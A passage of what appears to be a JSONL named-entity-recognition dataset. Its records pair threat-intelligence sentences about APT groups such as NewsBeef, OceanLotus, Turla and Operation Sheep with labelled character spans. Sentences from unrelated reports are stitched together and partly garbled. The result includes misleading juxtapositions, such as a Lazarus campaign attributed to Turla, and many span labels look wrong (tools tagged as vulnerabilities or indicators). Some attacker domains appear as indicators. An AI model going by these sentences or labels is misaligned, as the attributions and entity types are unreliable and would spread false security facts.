MuddyWater first surfaced in 2017 . First stage infections and graphical decoys have been described by multiple sources , including in our previous research MuddyWater expands operations . MuddyWater compiles various offensive Python scripts . This includes Python scripts . Usually , the Stageless Meterpreter has the Ext_server_stdapi.x64.dll\u201d , Ext_server_extapi.x64.dll\u201d , and Ext_server_espia.x64.dll\u201d extensions . The January 2017 report followed up on other private reports published on the group\u2019s BeEF-related activity in 2015 and 2016 . Previous analysis of the NewsBeef APT indicates that the group focuses on Saudi Arabian and Western targets , and lacks advanced offensive technology development capabilities . However , in the summer of 2016 , NewsBeef deployed a new toolset that includes macro-enabled Office documents , PowerSploit , and the Pupy backdoor . The most recent NewsBeef campaign uses this toolset in conjunction with spearphishing emails , links sent over social media/standalone private messaging applications , and watering hole attacks that leverage compromised high-profile websites some belonging to the SA government . The NewsBeef actor deployed a new toolset in a campaign that focused primarily on Saudi Arabian targets . NewsBeef continues to deploy malicious macro-enabled Office documents , poisoned legitimate Flash and Chrome installers , PowerSploit , and Pupy tools . The NewsBeef campaign is divided into two main attack vectors , spearphishing and strategic web compromise watering hole attacks . On December 25 , 2016 , the NewsBeef APT stood up a server to host a new set of Microsoft Office documents (maintaining malicious macros and PowerShell scripts) to support its spear-phishing operations . These compromised servers include Saudi Arabian government servers and other high-value organizational identities relevant to NewsBeef's targets . However , Kaspersky Security Network records also contain links that victims clicked from the Outlook web client outlook.live.com\u201d as well as attachments arriving through the Outlook desktop application . Interestingly , NewsBeef set up its server using the hosting provider Choopa , LLC , US\u201d , the same hosting provider that the group used in attacks over the summer of 2016 . NTG\u2019s IT focus and client list likely aided NewsBeef\u2019s delivery of malicious PowerShell-enabled Office documents and poisoned installers . In other schemes , NewsBeef sent macro-enabled Office attachments from spoofed law firm identities or other relevant service providers to targets in SA . The law firm in this scheme is based in the United Kingdom and is the sole location for targets outside of SA for this campaign . Starting in October 2016 , NewsBeef compromised a set of legitimate servers (shown below) , and injected JavaScript to redirect visitors to http://analytics-google.org:69/Check.aspx . For example , on a Saudi government website , the NewsBeef APT delivered packed JavaScript into the bottom of a referenced script that is included in every page served from the site the packed and unpacked JavaScript is shown below . The JavaScript forces visiting web browsers to collect and send (via a POST request) web browser , browser version , country of origin , and IP address data to the attacker controlled server jquerycodedownload.live/check.aspx\u201d . A high volume of redirections from the compromised site continues into mid-January 2017 . However , as this recent campaign indicates , the NewsBeef APT appears to have shifted its intrusion toolset aACT from BeEF and towards macro-enabled malicious Office documents , PowerSploit , and Pupy . Despite this shift in toolset , the group still relies on old infrastructure as evidenced by their reuse of servers hosted by the service providers Choopa and Atlantic.net . Its attack activities can be traced back to April 2012 . The OceanLotus reflects a very strong confrontational ability and willing to attack by keep evolving their techniques . These APT attacks and adopting confrontation measures will exist for a long time . OceanLotus\u2019 targets are global . OceanLotus have been actively using since at least early 2018 . OceanLotus malware family samples used no earlier than 2017 . we identified two methods to deliver the KerrDown downloader to targets . The link to the final payload of KerrDown was still active during the time of analysis and hence we were able to download a copy which turned out to be a variant of Cobalt Strike Beacon . While investigating KerrDown we found multiple RAR files containing a variant of the malware . Therefore , it is clear that the OceanLotus group works during weekdays and takes a break during the weekends . The group was first revealed and named by SkyEye Team in May 2015 . OceanLotus's targets include China's maritime institutions , maritime construction , scientific research institutes and shipping enterprises .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 24, "end": 33, "label": "Organization"}, {"start": 137, "end": 150, "label": "Vulnerability"}, {"start": 299, "end": 313, "label": "Vulnerability"}, {"start": 318, "end": 331, "label": "Vulnerability"}, {"start": 338, "end": 348, "label": "Malware"}, {"start": 397, "end": 403, "label": "Organization"}, {"start": 615, "end": 629, "label": "Indicator"}, {"start": 676, "end": 679, "label": "System"}, {"start": 680, "end": 688, "label": "Indicator"}, {"start": 816, "end": 824, "label": "Indicator"}, {"start": 872, "end": 879, "label": "Vulnerability"}, {"start": 882, "end": 895, "label": "Vulnerability"}, {"start": 990, "end": 1003, "label": "Organization"}, {"start": 1022, "end": 1035, "label": "Vulnerability"}, {"start": 1045, "end": 1059, "label": "Malware"}, {"start": 1099, "end": 1112, "label": "Organization"}, {"start": 1125, "end": 1132, "label": "Vulnerability"}, {"start": 1165, "end": 1178, "label": "Vulnerability"}, {"start": 1304, "end": 1311, "label": "Indicator"}, {"start": 1337, "end": 1342, "label": "Indicator"}, {"start": 1396, "end": 1400, "label": "System"}, {"start": 1439, "end": 1453, "label": "Vulnerability"}, {"start": 1520, "end": 1534, "label": "Indicator"}, {"start": 1565, "end": 1577, "label": "Indicator"}, {"start": 1737, "end": 1744, "label": "Vulnerability"}, {"start": 1745, "end": 1758, "label": "Vulnerability"}, {"start": 1776, "end": 1801, "label": "Indicator"}, {"start": 1804, "end": 1818, "label": "Indicator"}, {"start": 1992, "end": 2003, "label": "Organization"}, {"start": 2176, "end": 2186, "label": "Indicator"}, {"start": 2201, "end": 2220, "label": "Indicator"}, {"start": 2258, "end": 2266, "label": "Indicator"}, {"start": 2445, "end": 2454, "label": "Indicator"}, {"start": 2579, "end": 2592, "label": "Indicator"}, {"start": 2595, "end": 2603, "label": "Malware"}, {"start": 2634, "end": 2644, "label": "Organization"}, {"start": 2681, "end": 2692, "label": "Malware"}, {"start": 2701, "end": 2714, "label": "Malware"}, {"start": 2740, "end": 2749, "label": "Indicator"}, {"start": 2958, "end": 2970, "label": "Organization"}, {"start": 3112, "end": 3124, "label": "Organization"}, {"start": 3270, "end": 3280, "label": "Organization"}, {"start": 3364, "end": 3370, "label": "System"}, {"start": 3414, "end": 3424, "label": "Organization"}, {"start": 3756, "end": 3766, "label": "System"}, {"start": 3770, "end": 3782, "label": "Organization"}, {"start": 3789, "end": 3808, "label": "Malware"}, {"start": 3848, "end": 3858, "label": "System"}, {"start": 3880, "end": 3890, "label": "System"}, {"start": 3916, "end": 3925, "label": "Indicator"}, {"start": 3933, "end": 3941, "label": "Malware"}, {"start": 4010, "end": 4020, "label": "Organization"}, {"start": 4076, "end": 4086, "label": "Organization"}, {"start": 4094, "end": 4126, "label": "Organization"}, {"start": 4142, "end": 4149, "label": "Organization"}, {"start": 4154, "end": 4160, "label": "Organization"}, {"start": 4216, "end": 4226, "label": "Organization"}, {"start": 4353, "end": 4361, "label": "Indicator"}, {"start": 4380, "end": 4386, "label": "System"}, {"start": 4482, "end": 4494, "label": "Organization"}, {"start": 4618, "end": 4625, "label": "Organization"}, {"start": 4641, "end": 4651, "label": "Organization"}, {"start": 4798, "end": 4808, "label": "Organization"}, {"start": 4830, "end": 4840, "label": "Organization"}, {"start": 4868, "end": 4874, "label": "Malware"}, {"start": 4875, "end": 4882, "label": "Malware"}, {"start": 4899, "end": 4905, "label": "System"}, {"start": 4930, "end": 4951, "label": "Indicator"}, {"start": 4960, "end": 4986, "label": "Indicator"}, {"start": 4989, "end": 5015, "label": "Indicator"}, {"start": 5022, "end": 5047, "label": "Indicator"}, {"start": 5147, "end": 5159, "label": "Organization"}, {"start": 5213, "end": 5221, "label": "Organization"}, {"start": 5399, "end": 5407, "label": "Organization"}, {"start": 5445, "end": 5475, "label": "Malware"}, {"start": 5478, "end": 5489, "label": "Malware"}, {"start": 5500, "end": 5513, "label": "Malware"}, {"start": 5532, "end": 5540, "label": "Organization"}, {"start": 5602, "end": 5608, "label": "System"}, {"start": 5800, "end": 5808, "label": "Organization"}, {"start": 5902, "end": 5910, "label": "Organization"}, {"start": 5994, "end": 5999, "label": "Malware"}, {"start": 6004, "end": 6021, "label": "Malware"}, {"start": 6024, "end": 6035, "label": "Malware"}, {"start": 6042, "end": 6052, "label": "Malware"}, {"start": 6059, "end": 6067, "label": "Organization"}, {"start": 6214, "end": 6222, "label": "Organization"}, {"start": 6266, "end": 6275, "label": "Organization"}, {"start": 6327, "end": 6337, "label": "System"}, {"start": 6516, "end": 6526, "label": "Organization"}, {"start": 6547, "end": 6556, "label": "Organization"}, {"start": 6631, "end": 6638, "label": "System"}, {"start": 6650, "end": 6667, "label": "Indicator"}, {"start": 6712, "end": 6719, "label": "System"}, {"start": 6758, "end": 6766, "label": "Organization"}, {"start": 6812, "end": 6818, "label": "Malware"}, {"start": 6821, "end": 6824, "label": "Malware"}, {"start": 6827, "end": 6830, "label": "Malware"}, {"start": 6916, "end": 6921, "label": "Organization"}, {"start": 6960, "end": 6970, "label": "Organization"}, {"start": 7074, "end": 7082, "label": "Organization"}, {"start": 7297, "end": 7304, "label": "Organization"}, {"start": 7366, "end": 7374, "label": "Organization"}, {"start": 7573, "end": 7581, "label": "Organization"}, {"start": 7729, "end": 7739, "label": "Malware"}, {"start": 7761, "end": 7771, "label": "Indicator"}, {"start": 7898, "end": 7900, "label": "Indicator"}, {"start": 8003, "end": 8015, "label": "Organization"}, {"start": 8126, "end": 8134, "label": "Organization"}, {"start": 8236, "end": 8252, "label": "Malware"}, {"start": 8255, "end": 8266, "label": "Malware"}, {"start": 8273, "end": 8277, "label": "Malware"}, {"start": 8515, "end": 8525, "label": "Organization"}, {"start": 8653, "end": 8684, "label": "Organization"}, {"start": 8714, "end": 8725, "label": "Organization"}, {"start": 8747, "end": 8757, "label": "Organization"}, {"start": 8811, "end": 8821, "label": "Organization"}, {"start": 8914, "end": 8922, "label": "Indicator"}, {"start": 8980, "end": 8988, "label": "Indicator"}, {"start": 9155, "end": 9163, "label": "Indicator"}, {"start": 9263, "end": 9273, "label": "Organization"}, {"start": 9410, "end": 9422, "label": "Organization"}, {"start": 9447, "end": 9468, "label": "Organization"}, {"start": 9471, "end": 9492, "label": "Organization"}, {"start": 9495, "end": 9525, "label": "Organization"}, {"start": 9530, "end": 9550, "label": "Organization"}]}
{"text": "Based on our telemetry , Kaspersky can reassemble ScarCruft\u2019s binary infection procedure . RedDrip Team (formerly SkyEye Team ) has been to OceanLotus to keep track of high strength , groupactivity , found it in the near future to Indochinese Peninsula countries since 2019 On April 1 , 2019 , RedDrip discovered a Vietnamese file name Hop dong sungroup.rar in the process of daily monitoring the attack activities of the OceanLotus . COCCOC is a Vietnam was founded in 2013 . In fact , according to reports of various security vendors , OceanLotus also attacked several countries , including Cambodia , Thailand , Laos , even some victims in Vietnam , like opinion leaders , media , real estate companies , foreign enterprises and banks . Unlike the 2016 variants of Ratsnif that stored all packets to a PCAP file . these threat actors targeted a number of government agencies threat actors targeted a number of government agencies in East Asia . Attackers relied on Microsoft Equation Editor exploit CVE-2018-0798 to deliver a custom malware that Proofpoint researchers have dubbed Cotx RAT. Maudi Surveillance Operation which was previously reported in 2013 . specifically CVE-2018-0798 , before downloading subsequent payloads . The dropped PE file has the distinctive file name 8.t\u201d . The last process is utilized as part of the loading process for Cotx RAT and involves the legitimate Symantec binary noted above . These conflicts have even resulted in Haftar leading an attack on the capital city in April . The attackers have targeted a large number of organizations globally since early 2017 . Attackers were initially discovered while investigating a phishing attack that targeted political figures in the MENA region . Group's targets include high-profile entities such as parliaments , senates , top state offices and officials , political science scholars , military and intelligence agencies , ministries , media outlets , research centers , election commissions , Olympic organizations , large trading companies , and other unknown entities . Cisco Talos recently published a blogpost describing targeted attacks in the Middle East region which we believe may be connected . Operation Parliament appears to be another symptom of escalating tensions in the Middle East region . The attackers have taken great care to stay under the radar , imitating another attack group in the region . With deception and false flags increasingly being employed by threat actors , attribution is a hard and complicated task that requires solid evidence , especially in complex regions such as the Middle East . The malware was first seen packed with VMProtect; when unpacked the sample didn\u2019t show any similarities with previously known malware . The malware starts communicating with the C&C server by sending basic information about the infected machine . The malware basically provides a remote CMD/PowerShell terminal for the attackers , enabling them to execute scripts/commands and receive the results via HTTP requests . What lied beneath this facade was a well-engineered campaign of phishing attacks designed to steal credentials and spy on the activity of dozens of journalists , human rights defenders , trade unions and labour rights activists , many of whom are seemingly involved in the issue of migrants\u2019 rights in Qatar and Nepal . We refer to this campaign and the associated actor as Operation Kingphish Malik\u201d , in one of its written forms in Arabic , translates to King\u201d . It is worth noting that in December 2016 , Amnesty International published an investigation into another social engineering campaign perpetrated by a seemingly fake human rights organization known as Voiceless Victims , which targeted international human rights and labour rights organizations campaigning on migrant workers\u2019 rights in Qatar . It appears that the attackers may have impersonated the identity of a real young woman and stole her pictures to construct the fake profile , along with a professional biography also stolen from yet another person . In the course of this email correspondence , the attacker \u2014 Safeena\u201d \u2014 then sent what appeared to be invitations to access several documents on Google Drive . The attackers were meticulous in making their phishing page as credible as possible . Among the targets of this campaign is the International Trade Union Confederation .", "spans": [{"start": 25, "end": 34, "label": "Organization"}, {"start": 50, "end": 61, "label": "Organization"}, {"start": 91, "end": 103, "label": "Organization"}, {"start": 114, "end": 125, "label": "Organization"}, {"start": 140, "end": 150, "label": "Organization"}, {"start": 294, "end": 301, "label": "Organization"}, {"start": 422, "end": 432, "label": "Organization"}, {"start": 435, "end": 441, "label": "Organization"}, {"start": 538, "end": 548, "label": "Organization"}, {"start": 676, "end": 681, "label": "Organization"}, {"start": 684, "end": 705, "label": "Organization"}, {"start": 708, "end": 727, "label": "Organization"}, {"start": 732, "end": 737, "label": "Organization"}, {"start": 768, "end": 775, "label": "Organization"}, {"start": 885, "end": 891, "label": "Organization"}, {"start": 913, "end": 923, "label": "Organization"}, {"start": 924, "end": 932, "label": "Organization"}, {"start": 948, "end": 957, "label": "Organization"}, {"start": 968, "end": 977, "label": "Organization"}, {"start": 994, "end": 1001, "label": "Vulnerability"}, {"start": 1002, "end": 1015, "label": "Vulnerability"}, {"start": 1094, "end": 1099, "label": "Organization"}, {"start": 1176, "end": 1189, "label": "Vulnerability"}, {"start": 1245, "end": 1247, "label": "Malware"}, {"start": 1283, "end": 1287, "label": "Indicator"}, {"start": 1354, "end": 1362, "label": "Organization"}, {"start": 1391, "end": 1399, "label": "Organization"}, {"start": 1459, "end": 1465, "label": "Organization"}, {"start": 1519, "end": 1528, "label": "Organization"}, {"start": 1603, "end": 1612, "label": "Organization"}, {"start": 1691, "end": 1700, "label": "Organization"}, {"start": 1730, "end": 1737, "label": "Organization"}, {"start": 1784, "end": 1795, "label": "Organization"}, {"start": 1798, "end": 1805, "label": "Organization"}, {"start": 1808, "end": 1825, "label": "Organization"}, {"start": 1830, "end": 1839, "label": "Organization"}, {"start": 1842, "end": 1868, "label": "Organization"}, {"start": 1871, "end": 1879, "label": "Organization"}, {"start": 1884, "end": 1905, "label": "Organization"}, {"start": 1908, "end": 1918, "label": "Organization"}, {"start": 1921, "end": 1934, "label": "Organization"}, {"start": 1937, "end": 1953, "label": "Organization"}, {"start": 1956, "end": 1976, "label": "Organization"}, {"start": 1979, "end": 2000, "label": "Organization"}, {"start": 2009, "end": 2026, "label": "Organization"}, {"start": 2039, "end": 2055, "label": "Organization"}, {"start": 2058, "end": 2069, "label": "Organization"}, {"start": 2190, "end": 2210, "label": "Organization"}, {"start": 2296, "end": 2305, "label": "Organization"}, {"start": 2470, "end": 2476, "label": "Organization"}, {"start": 2613, "end": 2620, "label": "Indicator"}, {"start": 2749, "end": 2756, "label": "Indicator"}, {"start": 2787, "end": 2790, "label": "System"}, {"start": 2860, "end": 2867, "label": "Indicator"}, {"start": 2896, "end": 2910, "label": "Malware"}, {"start": 2928, "end": 2937, "label": "Organization"}, {"start": 3010, "end": 3014, "label": "Indicator"}, {"start": 3400, "end": 3419, "label": "Organization"}, {"start": 3691, "end": 3700, "label": "Organization"}, {"start": 3855, "end": 3864, "label": "Organization"}, {"start": 4073, "end": 4078, "label": "System"}, {"start": 4100, "end": 4108, "label": "Organization"}, {"start": 4214, "end": 4223, "label": "Organization"}, {"start": 4352, "end": 4377, "label": "Organization"}]}
{"text": "In addition , Kaspersky analyzed the victims of this campaign and spotted an interesting overlap of this campaign with another APT actor known as DarkHotel . Both in the attacks against ITUC and in other occasions , Operation Kingphish approached selected targets over social media , prominently Facebook , and engaged in chat conversations with them on and off , sometimes over a period of several months . This time the document purported to be about the involvement of the Emir of Qatar in funding ISIS , which was seemingly copied from a website critical of Qatar . While there is a clear underlying Qatar migrant workers theme in Operation Sheep , it is also hypothetically possible that these attacks could have been perpetrated by a malicious actor affiliated to a different government with an interest in damaging the reputation of the State of Qatar . Dubbed \u2018Operation Sheep\u2019 , this massive data stealing campaign is the first known campaign seen in the wild to exploit the Man-in-the-Disk vulnerability revealed by Check Point Research earlier last year . The SDK , named SWAnalytics is integrated into seemingly innocent Android applications published on major 3rd party Chinese app stores such as Tencent MyApp , Wandoujia , Huawei App Store , and Xiaomi App Store . After app installation , whenever SWAnalytics senses victims opening up infected applications or rebooting their phones , it silently uploads their entire contacts list to Hangzhou Shun Wang Technologies controlled servers . In theory , Shun Wang Technologies could have collected a third of China\u2019s population names and contact numbers if not more . With no clear declaration of usage from Shun Wang , nor proper regulatory supervision , such data could circulate into underground markets for further exploit , ranging from rogue marketing , targeted telephone scams or even friend referral program abuse during November\u2019s Single\u2019s Day and December\u2019s Asian online shopping fest . This paper will cover the discovery of this campaign , dubbed \u2018Operation Sheep\u2019 , and an analysis of SWAnalytics . In mid-September , an app named \u2018Network Speed Master\u2019 stood out on our radar with its rather unusual behavior patterns . This module monitors a wide range of device activities including application installation / remove / update , phone restart and battery charge . It turns out that contacts data isn\u2019t the only unusual data SWAnalytics is interested in . With default settings , SWAnalytics will scan through an Android device\u2019s external storage , looking for directory tencent/MobileQQ/WebViewCheck\u201d . From our first malicious sample encounter back in mid-September until now , we have observed 12 infected applications , the majority of which are in the system utility category . By listing sub-folders , SWAnalytics is able to infer QQ accounts which have never been used on the device . Operation Sheep is the first campaign we have observed in the wild that abuses similar concept since our MitD publication . To make this data harvesting operation flexible , SWAnalytics equips the ability to receive and process configuration files from a remote Command-and-Control . Whenever users reboot their device or open up Network Speed Master , SWAnalytics will fetch the latest configuration file from http[:]//mbl[.]shunwang[.]com/cfg/config[.]json\u201d . In order to understand SWAnalytics\u2019 impact , we turned to public download volume data available on Chandashi , one of the app store optimization vendors specialized in Chinese mobile application markets . Data points span from September 2018 to January 2019 where we observed over 17 million downloads in just five months . In China alone , we have seen underground market sheep shavers\u201d ported SMS rogue marketing strategy to spread Alipay Red Packet referral URL links . In Operation Sheep\u2019s case , Shun Wang likely harvests end user contact lists without application developer acknowledgement . According to Cheetah Mobile\u2019s follow-up investigation , fraudulent behaviors came from two 3rd party SDKs Batmobi , Duapps integrated inside Cheetah SDK . It is likely a new campaign or actor started using Panda Banker since in addition to the previously unseen Japanese targeting , Arbor has not seen any indicator of compromise (IOC) overlaps with previous Panda Banker campaigns . Webinjects targeting Japan , a country we haven\u2019t seen targeted by Panda Banker before . Japan is no stranger to banking malware . Based on recent reports , the country has been plagued by attacks using the Ursnif and Urlzone banking malware . This post was our first analysis of the first Panda Banker campaign that we\u2019ve seen to target financial institutions in Japan . Operation Pawn Storm is an active economic and political cyber-espionage operation that targets a wide range of entities , like the military , governments , defense industries , and the media . we believe the iOS malware gets installed on already compromised systems , and it is very similar to next stage SEDNIT malware we have found for Microsoft Windows\u2019 systems . we found two malicious iOS applications in Operation Pawn Storm . One is called XAgent detected as IOS_XAGENT.A and the other one uses the name of a legitimate iOS game , MadCap detected as IOS_ XAGENT.B . The obvious goal of the SEDNIT-related spyware is to steal personal data , record audio , make screenshots , and send them to a remote command-and-control (C&C) server .", "spans": [{"start": 14, "end": 23, "label": "Organization"}, {"start": 146, "end": 155, "label": "Organization"}, {"start": 186, "end": 190, "label": "Organization"}, {"start": 216, "end": 235, "label": "Organization"}, {"start": 269, "end": 281, "label": "Malware"}, {"start": 284, "end": 304, "label": "Malware"}, {"start": 635, "end": 650, "label": "Organization"}, {"start": 868, "end": 885, "label": "Organization"}, {"start": 972, "end": 979, "label": "Vulnerability"}, {"start": 984, "end": 999, "label": "Vulnerability"}, {"start": 1071, "end": 1074, "label": "Malware"}, {"start": 1083, "end": 1094, "label": "Indicator"}, {"start": 1133, "end": 1140, "label": "System"}, {"start": 1210, "end": 1223, "label": "Organization"}, {"start": 1226, "end": 1235, "label": "Organization"}, {"start": 1238, "end": 1254, "label": "Organization"}, {"start": 1261, "end": 1277, "label": "Organization"}, {"start": 1314, "end": 1325, "label": "Indicator"}, {"start": 1517, "end": 1526, "label": "Organization"}, {"start": 1671, "end": 1680, "label": "Organization"}, {"start": 1782, "end": 1789, "label": "Vulnerability"}, {"start": 2023, "end": 2040, "label": "Organization"}, {"start": 2108, "end": 2130, "label": "Organization"}, {"start": 2203, "end": 2209, "label": "Indicator"}, {"start": 2403, "end": 2414, "label": "Indicator"}, {"start": 2458, "end": 2469, "label": "Indicator"}, {"start": 2491, "end": 2498, "label": "System"}, {"start": 2597, "end": 2613, "label": "Indicator"}, {"start": 2786, "end": 2797, "label": "Indicator"}, {"start": 2870, "end": 2885, "label": "Organization"}, {"start": 3044, "end": 3055, "label": "Indicator"}, {"start": 3223, "end": 3234, "label": "Indicator"}, {"start": 3355, "end": 3367, "label": "Indicator"}, {"start": 3705, "end": 3719, "label": "Organization"}, {"start": 3833, "end": 3842, "label": "Organization"}, {"start": 4036, "end": 4043, "label": "Indicator"}, {"start": 4046, "end": 4052, "label": "Indicator"}, {"start": 4071, "end": 4082, "label": "Indicator"}, {"start": 4116, "end": 4121, "label": "Organization"}, {"start": 4136, "end": 4148, "label": "Malware"}, {"start": 4213, "end": 4218, "label": "Organization"}, {"start": 4289, "end": 4301, "label": "Indicator"}, {"start": 4381, "end": 4393, "label": "Indicator"}, {"start": 4427, "end": 4434, "label": "Indicator"}, {"start": 4435, "end": 4442, "label": "Indicator"}, {"start": 4521, "end": 4527, "label": "Indicator"}, {"start": 4532, "end": 4539, "label": "Indicator"}, {"start": 4604, "end": 4616, "label": "Indicator"}, {"start": 4652, "end": 4674, "label": "Organization"}, {"start": 4686, "end": 4706, "label": "Organization"}, {"start": 4720, "end": 4728, "label": "Organization"}, {"start": 4733, "end": 4742, "label": "Organization"}, {"start": 4818, "end": 4826, "label": "Organization"}, {"start": 4829, "end": 4840, "label": "Organization"}, {"start": 4843, "end": 4861, "label": "Organization"}, {"start": 4872, "end": 4877, "label": "Organization"}, {"start": 4992, "end": 4998, "label": "Indicator"}, {"start": 5025, "end": 5034, "label": "Organization"}, {"start": 5134, "end": 5140, "label": "Indicator"}, {"start": 5153, "end": 5165, "label": "Indicator"}, {"start": 5225, "end": 5231, "label": "Indicator"}, {"start": 5249, "end": 5257, "label": "Indicator"}, {"start": 5284, "end": 5298, "label": "Organization"}, {"start": 5319, "end": 5332, "label": "Organization"}]}
{"text": "Secureworks researchers investigated activities associated with the BRONZE BUTLER (also known as Tick) threat group , which likely originates in the People . To learn more about this campaign , you may refer to our report , Operation Pawn Storm Using Decoys to Evade Detection . Additionally , we discovered a new DNS hijacking technique that we assess with moderate confidence is connected to the actors behind Sea Turtle . Talos now has moderate confidence that the threat actors behind Sea Turtle have been using another DNS hijacking technique . This technique was also observed against a government organizations in the Middle East and North African region . Cisco telemetry confirmed that the actors behind Sea Turtle maintained access to the ICS-Forth network from an operational command and control (C2) node . Our telemetry indicates that the actors maintained access in the ICS-Forth network through at least April 24 , five days after the statement was publicly released . This full-blown spying framework consists of two packages named \u2018Tokyo\u2019 and \u2018Yokohama\u2019 . Just to highlight its capabilities , TajMahal is able to steal data from a CD burnt by a victim as well as from the printer queue . The first confirmed date when TajMahal samples were seen on a victim\u2019s machine is August 2014 . More details about TajMahal are available to customers of the Kaspersky Intelligence Reporting service .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 68, "end": 81, "label": "Organization"}, {"start": 261, "end": 276, "label": "Organization"}, {"start": 314, "end": 317, "label": "Indicator"}, {"start": 398, "end": 404, "label": "Organization"}, {"start": 425, "end": 430, "label": "Organization"}, {"start": 524, "end": 527, "label": "Indicator"}, {"start": 664, "end": 669, "label": "Organization"}, {"start": 799, "end": 811, "label": "Malware"}, {"start": 852, "end": 858, "label": "Organization"}, {"start": 1048, "end": 1055, "label": "Indicator"}, {"start": 1060, "end": 1070, "label": "Indicator"}, {"start": 1110, "end": 1118, "label": "Indicator"}, {"start": 1235, "end": 1243, "label": "Indicator"}, {"start": 1320, "end": 1328, "label": "Indicator"}, {"start": 1363, "end": 1372, "label": "Organization"}]}
{"text": "However , an investigation by Symantec has found that Butterfly has been active since at least March 2012 and its attacks have not only continued to the present day , but have also increased in number . The dropper first appeared in mid-July , suggesting that this APT activity is potentially ongoing , with Turla actively targeting G20 participants and/or those with interest in the G20 , including member nations , journalists , and policymakers . Turla is a well-documented , long operating APT group that is widely believed to be a Russian state-sponsored organization . Turla is perhaps most notoriously suspected as responsible for the breach of the United States Central Command in 2008 . More recently Turla was accused of breaching RUAG , a Swiss technology company , in a public report published by GovCERT.ch . The delivery of KopiLuwak in this instance is currently unknown as the MSIL dropper has only been observed by Proofpoint researchers on a public malware repository . Assuming this variant of KopiLuwak has been observed in the wild , there are a number of ACTs it may have been delivered including some of Turla\u2019s previous attack methods such as spear phishing or via a watering hole . This could include diplomats , experts in the LOCs of interest related to the Digital Economy Task Force , or possibly even journalists . Turla's goal could include diplomats , experts in the LOCs of interest related to the Digital Economy Task Force , or possibly even journalists . The earliest step in any possible attack(s) involving this variant of KopiLuwak of which Proofpoint researchers are currently aware begin with the MSIL dropper . The basic chain of events upon execution of the MSIL dropper include dropping and executing both a PDF decoy and a Javascript (JS) dropper . As explained in further detail below , the JS dropper ultimately installs a JS decryptor onto an infected machine that will then finally decrypt and execute the actual KopiLuwak backdoor in memory only . As Proofpoint has not yet observed this attack in the wild it is likely that there is an additional component that leads to the execution of the MSIL payload . The newer variant of KopiLuwak is now capable of exfiltrating files to the C&C as well as downloading files and saving them to the infected machine . Despite the added capabilities , we still agree with Kaspersky that this backdoor is likely used as an initial reconnaissance tool and would probably be used as a staging point to deploy one of Turla\u2019s more fully featured implants . Turla is a complex cyberattack platform focused predominantly on diplomatic and government-related targets , particularly in the Middle East , Central and Far East Asia , Europe , North and South America and former Soviet bloc nations . We didn\u2019t choose to name it after a vegetable; the .NET malware developers named it Topinambour themselves . The role of the .NET module is to deliver the known KopiLuwak JavaScript Trojan . Moreover , Turla now also has a heavily obfuscated PowerShell Trojan that is similar to KopiLuwak .", "spans": [{"start": 30, "end": 38, "label": "Organization"}, {"start": 54, "end": 63, "label": "Organization"}, {"start": 308, "end": 313, "label": "Organization"}, {"start": 333, "end": 336, "label": "Organization"}, {"start": 450, "end": 455, "label": "Organization"}, {"start": 575, "end": 580, "label": "Organization"}, {"start": 710, "end": 715, "label": "Organization"}, {"start": 741, "end": 745, "label": "Organization"}, {"start": 809, "end": 819, "label": "Organization"}, {"start": 893, "end": 905, "label": "Indicator"}, {"start": 932, "end": 942, "label": "Organization"}, {"start": 1127, "end": 1134, "label": "Organization"}, {"start": 1226, "end": 1235, "label": "Organization"}, {"start": 1331, "end": 1342, "label": "Organization"}, {"start": 1345, "end": 1352, "label": "Organization"}, {"start": 1431, "end": 1446, "label": "Organization"}, {"start": 1561, "end": 1570, "label": "Indicator"}, {"start": 1638, "end": 1650, "label": "Indicator"}, {"start": 1701, "end": 1713, "label": "Indicator"}, {"start": 1752, "end": 1755, "label": "System"}, {"start": 1768, "end": 1791, "label": "Indicator"}, {"start": 1837, "end": 1847, "label": "Indicator"}, {"start": 1870, "end": 1882, "label": "Indicator"}, {"start": 1962, "end": 1971, "label": "Indicator"}, {"start": 2001, "end": 2011, "label": "Organization"}, {"start": 2143, "end": 2155, "label": "Indicator"}, {"start": 2179, "end": 2188, "label": "Indicator"}, {"start": 2233, "end": 2236, "label": "System"}, {"start": 2361, "end": 2370, "label": "Organization"}, {"start": 2502, "end": 2509, "label": "Organization"}, {"start": 2541, "end": 2546, "label": "Organization"}, {"start": 2829, "end": 2841, "label": "Indicator"}, {"start": 2862, "end": 2873, "label": "Indicator"}, {"start": 2903, "end": 2914, "label": "Indicator"}, {"start": 2939, "end": 2959, "label": "Indicator"}, {"start": 2960, "end": 2966, "label": "Malware"}, {"start": 2980, "end": 2985, "label": "Organization"}]}
{"text": "Talos assesses with high confidence that Group 123 was responsible for six campaigns . These campaign-related VPSs are located in South Africa .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 41, "end": 50, "label": "Organization"}, {"start": 110, "end": 114, "label": "System"}]}
{"text": "Attacks launched by Scarlet Mimic were publicly exposed on 2013 in a Trend Micro report about the FakeM Trojan . The tool does all that a typical Trojan needs to accomplish: upload , download and execute files , fingerprint target systems .", "spans": [{"start": 20, "end": 33, "label": "Organization"}, {"start": 69, "end": 80, "label": "Organization"}, {"start": 98, "end": 103, "label": "System"}, {"start": 104, "end": 110, "label": "System"}, {"start": 146, "end": 152, "label": "Indicator"}]}
{"text": "Finally , Talos identified a 6th campaign that is also linked to Group 123 . The PowerShell version of the Trojan also has the ability to get screenshots .", "spans": [{"start": 10, "end": 15, "label": "Organization"}, {"start": 65, "end": 74, "label": "Organization"}, {"start": 81, "end": 91, "label": "System"}, {"start": 107, "end": 113, "label": "Malware"}]}
{"text": "As Talos observed at the beginning of 2017 , Group 123 started a campaign corresponding with the new year in 2018 . The Trojan is quite similar to the .NET RocketMan Trojan Obviously and can handle the same commands; additionally , it includes the #screen\u201d command to take a screenshot .", "spans": [{"start": 3, "end": 8, "label": "Organization"}, {"start": 45, "end": 54, "label": "Organization"}, {"start": 120, "end": 126, "label": "Malware"}, {"start": 151, "end": 155, "label": "System"}, {"start": 156, "end": 165, "label": "Malware"}, {"start": 166, "end": 172, "label": "Malware"}]}
{"text": "Last month , researchers at Kaspersky reported on a Lazarus APT campaign targeting both macOS and Windows users . The usage of KopiLuwak , a well-known and exclusive artefact previously used by the Turla group , makes us attribute this campaign to this actor with high confidence .", "spans": [{"start": 28, "end": 37, "label": "Organization"}, {"start": 52, "end": 59, "label": "Organization"}, {"start": 127, "end": 136, "label": "Malware"}, {"start": 198, "end": 203, "label": "Organization"}]}
